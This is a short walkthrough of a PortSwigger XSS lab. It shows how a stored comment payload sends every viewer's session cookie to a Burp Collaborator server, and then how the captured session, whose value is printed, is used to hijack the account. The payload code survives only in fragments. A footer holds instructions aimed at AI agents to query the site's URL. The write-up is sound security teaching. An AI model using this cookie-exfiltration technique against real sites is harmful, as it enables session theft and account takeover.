# 22) Exploiting cross-site scripting to steal cookies

#### Locate possible injection points As usual the first step is to analyse the application, we have comment form so we fill it with random string like **xxxx** then open the developer tools and find where the user input is located in the html

let's try to inject a simple img payload in the comment field and try to trigger an alert payload => **`

`**

now let's open burp suite collaborator

```html

/?c="+document.cookie> ```

This payoad will make anyone who views the comment issue a Get request containing their cookie to your subdomain in the `urlSearchParam c` on the public Collaborator server. if the collaborator didn't poll automatically make sure to click on `Poll now`

so this is the session ``` zO3ZD5fvkLh3kA55da9fHJXdGMqXePrg ``` make sure to edit the session with the stolen one and save the edit, i used the Cookie Editor Extension you can use the devtools if you prefer

now refresh the page with the hijacked session, and the lab is solved

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sayonara.gitbook.io/writeups/portswigger/xss/22-exploiting-cross-site-scripting-to-steal-cookies.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.